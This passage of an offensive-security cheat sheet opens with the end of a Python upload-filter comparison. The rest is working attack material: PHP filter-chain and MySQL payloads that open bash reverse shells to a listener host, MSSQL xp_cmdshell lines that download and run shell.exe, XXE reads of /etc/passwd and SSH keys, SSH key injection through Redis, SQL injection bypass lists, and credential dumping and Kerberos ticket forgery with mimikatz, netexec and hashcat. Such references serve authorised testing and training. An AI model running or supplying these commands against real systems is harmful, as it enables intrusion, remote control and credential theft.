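def naive_is_allowed(filename: str) -> bool:
    """The check the list above defeats: a case-sensitive denylist on the raw
    text after the last dot, applied without decoding the submitted name."""
    return filename.rsplit(".", 1)[-1] not in {"php"}


def hardened_is_allowed(filename: str) -> Tuple[bool, str]:
    """Return (accepted, reason) for a submitted upload name.

    Order matters: decode first so %00, %20 and %0d%0a are seen as the bytes
    they become; reject control characters outright, since a C-based backend
    would truncate at NUL and store 'shell.php'; then strip, lowercase and
    inspect every dotted segment.
    """
    name = unquote(filename)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return False, "control character in name"
    if "/" in name or "\\" in name:
        return False, "path separator in name"
    name = name.strip().lower()          # a trailing space from %20 is no longer a disguise
    stem = name.partition(".")[0]
    segments = name.split(".")[1:]       # every extension-like segment, e.g. ['php', 'jpg']
    if not stem or not segments:
        return False, "no extension"
    for seg in segments:
        if seg in EXECUTABLE_SEGMENTS:
            return False, f"executable segment .{seg}"
    if segments[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension .{segments[-1]} not in allowlist"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample names drawn from the bypass list above plus two benign ones.
    for sample in ("shell.phP", "shell.php%00.jpg", "shell.php.jpg", "shell.php%20",
                   "shell.php%0d%0a.jpg", "shell.phtml", "holiday.JPG", "report.pdf"):
        print(f"{sample!r:22} naive={naive_is_allowed(sample)!s:5} hardened={hardened_is_allowed(sample)}")
```

Renaming the stored file to a server-generated name and serving uploads from a location with script execution disabled removes the remaining risk that the allowlist alone does not.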

PHP Filter Chain Generator

Reference: https://github.com/synacktiv/php_filter_chain_generator

python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>'
python3 php_filter_chain_generator.py --chain "<?php echo shell_exec(id); ?>"
python3 php_filter_chain_generator.py --chain """<?php echo shell_exec(id); ?>"""
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"");?>""""
http://<RHOST>/?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4
python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>'
[+] The following gadget chain will generate the following code : <?= exec($_GET[0]); ?> (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=<COMMAND>

PHP Generic Gadget Chains (PHPGGC)

phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/<FILE>.txt /PATH/TO/FILE/<FILE>.txt

Server-Side Request Forgery (SSRF)

https://<RHOST>/item/2?server=server.<RHOST>/file?id=9&x=

Server-Side Template Injection (SSTI)

Fuzzing string

Reference: https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti

${{<%[%'"}}%\.
Magic payload

Reference: https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

{{ ''.__class__.__mro__[1].__subclasses__() }}

Upload Vulnerabilities

ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution
SVG: Stored XSS / Server-Side Request Forgery
GIF: Stored XSS
CSV: CSV Injection
XML: XXE
AVI: Local File Inclusion / Server-Side Request Forgery
HTML/JS: HTML Injection / XSS / Open Redirect
PNG / JPEG: Pixel Flood Attack
ZIP: Remote Code Execution via Local File Inclusion
PDF / PPTX: Server-Side Request Forgery / Blind XXE

wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404'
Write results to a file
wfuzz -w /PATH/TO/WORDLIST -c -f <FILE> -u http://<RHOST> --hc 403,404
Custom scan with limited output
wfuzz -w /PATH/TO/WORDLIST -u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
Fuzz two parameters at once
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
Subdomain enumeration
wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.<RHOST>' -u http://<RHOST>/
Virtual host subdomain enumeration
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<RHOST>" --hc 200 --hw 356 -t 100 <RHOST>
Directory enumeration (GET)
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://<RHOST>/FUZZ --hc 403,404
Login brute force (POST)
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "email=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --hc 200 -c

wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "username=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --ss "Invalid login"
SQL injection enumeration
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<RHOST>/select http
Virtual host subdomain scanning
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ.<RHOST>" --filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/

wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -t 100

wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> --hw <value> -t 100
Enumerate numbered files
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip
Enumerate PIDs
wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000

wpscan

wpscan --url https://<RHOST> --enumerate u,t,p
wpscan --url https://<RHOST> --plugins-detection aggressive
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50

XML External Entity (XXE)

Malicious file payload request
GET / HTTP/1.1
Host: <RHOST>:<RPORT>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 136

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://<LHOST>:80/shell.php" >]>
<foo>&xxe;</foo>
Payloads
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xxe [ <!ENTITY passwd SYSTEM 'file:///etc/passwd'> ]>
<stockCheck><productId>&passwd;</productId><storeId>1</storeId></stockCheck>
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]><order><quantity>3</quantity><item>&test;</item><address>17th Estate, CA</address></order>
username=%26username%3b&version=1.0.0--><!DOCTYPE+username+[+<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--

Database Analysis Tools

impacket-mssqlclient

Common commands
enum_logins
enum_impersonate
Connect and log in
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
sudo mssqlclient.py <RHOST>/<USERNAME>:<USERNAME>@<RHOST> -windows-auth
export KRB5CCNAME=<USERNAME>.ccache # (import the ticket)
impacket-mssqlclient -k <RHOST>.<DOMAIN>
Privilege escalation
exec_as_login sa
enable_xp_cmdshell
xp_cmdshell whoami

MongoDB

mongo "mongodb://localhost:27017"

Basic operations:

> use <DATABASE>;
> show tables;
> show collections;
> db.system.keys.find();
> db.users.find();
> db.getUsers();
> db.getUsers({showCredentials: true});
> db.accounts.find();
> db.accounts.find().pretty();
> use admin;
Reset a user's password to "12345"
> db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })

MSSQL

Connect and log in
sqlcmd -S <RHOST> -U <USERNAME>
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
Show databases
1> SELECT name FROM master.sys.databases
2> go
OpenQuery
1> select * from openquery("web\clients", 'select name from master.sys.databases');
2> go
1> select * from openquery("web\clients", 'select name from clients.sys.objects');
2> go
Export a database file as base64 into a local text file
1> select cast((select content from openquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;
2> go > export.txt
Steal NetNTLM hash / relay attack
SQL> exec master.dbo.xp_dirtree '\\<LHOST>\FOOBAR'
Linked SQL server enumeration
SQL> SELECT user_name();
SQL> SELECT name,sysadmin FROM syslogins;
SQL> SELECT srvname,isremote FROM sysservers;
SQL> EXEC ('SELECT current_user') at [<DOMAIN>\<CONFIG_FILE>];
SQL> EXEC ('SELECT srvname,isremote FROM sysservers') at [<DOMAIN>\<CONFIG_FILE>];
SQL> EXEC ('EXEC (''SELECT suser_name()'') at [<DOMAIN>\<CONFIG_FILE>]') at [<DOMAIN>\<CONFIG_FILE>];
Execute xp_cmdshell
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
SQL> reconfigure
SQL> xp_cmdshell "whoami"
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
';EXEC master.dbo.xp_cmdshell 'ping <LHOST>';--
';EXEC master.dbo.xp_cmdshell 'certutil -urlcache -split -f http://<LHOST>/shell.exe C:\\Windows\temp\<FILE>.exe';--
';EXEC master.dbo.xp_cmdshell 'cmd /c C:\\Windows\\temp\\<FILE>.exe';--

MySQL

mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p
mysql> show databases;
mysql> use <DATABASE>;
mysql> show tables;
mysql> describe <TABLE>;
mysql> SELECT * FROM Users;
mysql> SELECT * FROM users \G;
mysql> SELECT Username,Password FROM Users;
Update a user's password
mysql> update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1;
Execute shell commands
mysql> \! /bin/sh
Insert code and execute it
mysql> insert into users (id, email) values (<LPORT>, "- E $(bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1')");
Write an SSH key into authorized_keys2
mysql> SELECT "<KEY>" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\n';

NoSQL Injection

admin'||''==='
{"username": {"$ne": null}, "password": {"$ne": null} }

PostgreSQL

psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>

Common database commands

postgres=# \list                     // list all databases
postgres=# \c // use a database
postgres=# \c <DATABASE> // use a specific database
postgres=# \s // command history
postgres=# \q // quit
<DATABASE>=# \dt // list tables in the current schema
<DATABASE>=# \dt *.* // list tables in all schemas
<DATABASE>=# \du // list user roles
<DATABASE>=# \du+ // list user roles (verbose)
<DATABASE>=# SELECT user; // get the current user
<DATABASE>=# TABLE <TABLE>; // select a table
<DATABASE>=# SELECT * FROM users; // select everything from the users table
<DATABASE>=# SHOW rds.extensions; // list installed extensions
<DATABASE>=# SELECT usename, passwd from pg_shadow; // read credentials

Redis

> AUTH <PASSWORD>
> AUTH <USERNAME> <PASSWORD>
> INFO SERVER
> INFO keyspace
> CONFIG GET *
> SELECT <NUMBER>
> KEYS *
> HSET // set the value of a field in a hash data structure
> HGET // retrieve a field and its value from a hash data structure
> HKEYS // retrieve all field names from a hash data structure
> HGETALL // retrieve all fields and values from a hash data structure
> GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b
> SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b "username|s:8:\"<USERNAME>\";role|s:5:\"admin\";auth|s:4:\"True\";" # the value "s:8" has to match the length of the username
Inject your own SSH key
redis-cli -h <RHOST>
echo "FLUSHALL" | redis-cli -h <RHOST>
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /PATH/TO/FILE/<FILE>.txt
cat /PATH/TO/FILE/<FILE>.txt | redis-cli -h <RHOST> -x set s-key
<RHOST>:6379> get s-key
<RHOST>:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
<RHOST>:6379> CONFIG SET dir /var/lib/redis/.ssh
OK
<RHOST>:6379> CONFIG SET dbfilename authorized_keys
OK
<RHOST>:6379> CONFIG GET dbfilename
1) "dbfilename"
2) "authorized_keys"
<RHOST>:6379> save
OK

SQL Injection

Master list
';#---              // Inject everywhere! Shout out to xsudoxx!
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
Authentication bypass
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

SQL Truncation Attack

'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'

sqlite3

sqlite3 <FILE>.db
sqlite> .tables
sqlite> PRAGMA table_info(<TABLE>);
sqlite> SELECT * FROM <TABLE>;

sqsh

sqsh -S <RHOST> -U <USERNAME>
sqsh -S '<RHOST>' -U '<USERNAME>' -P '<PASSWORD>'
sqsh -S '<RHOST>' -U '.\<USERNAME>' -P '<PASSWORD>'
List files and folders with xp_dirtree
EXEC master.sys.xp_dirtree N'C:\inetpub\wwwroot\',1,1;

Password Attacks

CrackMapExec

crackmapexec ldap -L
crackmapexec mysql -L
crackmapexec smb -L
crackmapexec ssh -L
crackmapexec winrm -L
crackmapexec smb <RHOST> -u '' -p '' --shares
crackmapexec smb <RHOST> -u '' -p '' --shares -M spider_plus
crackmapexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o READ_ONLY=false
crackmapexec smb <RHOST> -u " " -p "" --shares
crackmapexec smb <RHOST> -u " " -p "" --shares -M spider_plus
crackmapexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o READ_ONLY=false
crackmapexec smb <RHOST> -u guest -p '' --shares --rid-brute
crackmapexec smb <RHOST> -u guest -p '' --shares --rid-brute 100000
crackmapexec smb <RHOST> -u "guest" -p "" --shares --rid-brute
crackmapexec smb <RHOST> -u "guest" -p "" --shares --rid-brute 100000
crackmapexec ldap <RHOST> -u '' -p '' -M get-desc-users
crackmapexec smb <RHOST> -u "<USERNAME>" --use-kcache --sam
crackmapexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa
crackmapexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa -k
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --shares
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --sam
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --lsa
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --dpapi
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --sam
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --lsa
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --dpapi
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" -M lsassy
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds
crackmapexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds --user <USERNAME>
crackmapexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds --user <USERNAME>
crackmapexec smb <RHOST> -u "<USERNAME>" -H <HASH> -x "whoami"
crackmapexec winrm <SUBNET>/24 -u "<USERNAME>" -p "<PASSWORD>" -d .
crackmapexec winrm -u /t -p "<PASSWORD>" -d <DOMAIN> <RHOST>
crackmapexec winrm <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --shares
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --pass-pol
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --lusers
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --sam
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'net user Administrator /domain' --exec-method smbexec
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --wdigest enable
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'quser'

fcrackzip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip

Group Policy Preferences (GPP)

GPP decryption
python3 gpp-decrypt.py -f Groups.xml
python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

hashcat

https://hashcat.net/hashcat/

https://hashcat.net/wiki/doku.php?id=hashcat

https://hashcat.net/cap2hashcat/

https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat --example-hashes
hashcat --help | grep -i "ntlm"
hashcat -m 0 md5 /usr/share/wordlists/rockyou.txt
hashcat -m 100 sha-1 /usr/share/wordlists/rockyou.txt
hashcat -m 1400 sha256 /usr/share/wordlists/rockyou.txt
hashcat -m 3200 bcrypt /usr/share/wordlists/rockyou.txt
hashcat -m 900 md4 /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 1800 sha512 /usr/share/wordlists/rockyou.txt
hashcat -m 160 hmac-sha1 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u --force hash.txt ?3?3?1?1?1?1?2?3
Cracking AS-REP Roast hashes
hashcat -m 18200 -a 0 <FILE> <FILE>
Cracking Kerberoasting hashes
hashcat -m 13100 --force <FILE> <FILE>
Pattern-based brute force
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout
Generate candidate passwords: wordlist + pattern
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout
Generate a NetNTLMv2 hash with InternalMonologue and crack it with hashcat
InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800
Result
spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000
Crack with hashcat
hashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable
Rules

https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule

Cracking with OneRuleToRuleThemAll.rule
hashcat -m 3200 hash.txt -r /PATH/TO/FILE.rule

hydra

hydra <RHOST> -l <USERNAME> -p <PASSWORD> <PROTOCOL>
hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> <PROTOCOL>
hydra <RHOST> -C /PATH/TO/WORDLIST/<FILE> ftp
export HYDRA_PROXY=connect://127.0.0.1:8080
unset HYDRA_PROXY
hydra <RHOST> -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error"

hydra <RHOST> -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/index.php:username=user&password=^PASS^:Login failed. Invalid"

hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s <RPORT>

hydra <RHOST> -l root@localhost -P otrs-cewl.txt http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -vV -f

hydra <RHOST> -l admin -P /PATH/TO/WORDLIST/<FILE> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"

john

/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --show <FILE>

kerbrute

User enumeration
./kerbrute userenum -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES>
Password spraying
./kerbrute passwordspray -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES> <PASSWORD>

lazagne.exe

laZagne.exe all

mimikatz.exe

Common commands
token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN>
Dump hashes
.\mimikatz.exe
sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords
meterpreter > getprivs
meterpreter > creds_all
meterpreter > golden_ticket_create
Silver ticket
.\mimikatz.exe
sekurlsa::tickets /export
kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi
klist
dir \\<RHOST>\admin$
Golden ticket
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd
klist
dir \\<RHOST>\admin$
Skeleton key
privilege::debug
misc::skeleton
net use C:\\<RHOST>\admin$ /user:Administrator mimikatz
dir \\<RHOST>\c$ /user:<USERNAME> mimikatz

NetExec

netexec smb <RHOST> -u '' -p '' --shares
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o READ_ONLY=false
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=99999999
netexec smb <RHOST> -u " " -p "" --shares
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o READ_ONLY=false
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o DOWNLOAD_FLAG=True
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=99999999
netexec smb <RHOST> -u guest -p '' --shares --rid-brute
netexec smb <RHOST> -u guest -p '' --shares --rid-brute 100000
netexec smb <RHOST> -u "guest" -p "" --shares --rid-brute
netexec smb <RHOST> -u "guest" -p "" --shares --rid-brute 100000
netexec smb <RHOST> -u "<USERNAME>" --use-kcache --sam
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --shares
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --sam
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --lsa
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --dpapi
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --sam
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --lsa
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --dpapi
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" -M lsassy
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" -M web_delivery -o URL=http://<LHOST>/<FILE>
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds
netexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds --user <USERNAME>
netexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds --user <USERNAME>
netexec smb <RHOST> -u "<USERNAME>" -H <HASH> -x "whoami"
netexec ldap <RHOST> -u '' -p '' -M get-desc-users
netexec ldap <RHOST> -u "" -p "" -M get-desc-users
netexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa
netexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa -k
netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --bloodhound -ns <RHOST> -c all
netexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --bloodhound -ns <RHOST> -c all
netexec winrm <SUBNET>/24 -u "<USERNAME>" -p "<PASSWORD>" -d .
netexec winrm -u /t -p "<PASSWORD>" -d <DOMAIN> <RHOST>
netexec winrm <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt
netexec winrm <RHOST> -u '<USERNAME>' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --shares
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --pass-pol
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --lusers
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --sam
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'net user Administrator /domain' --exec-method smbexec
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --wdigest enable
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'quser'

pypykatz

pypykatz lsa minidump lsass.dmp
pypykatz registry --sam sam system

Exploitation tools
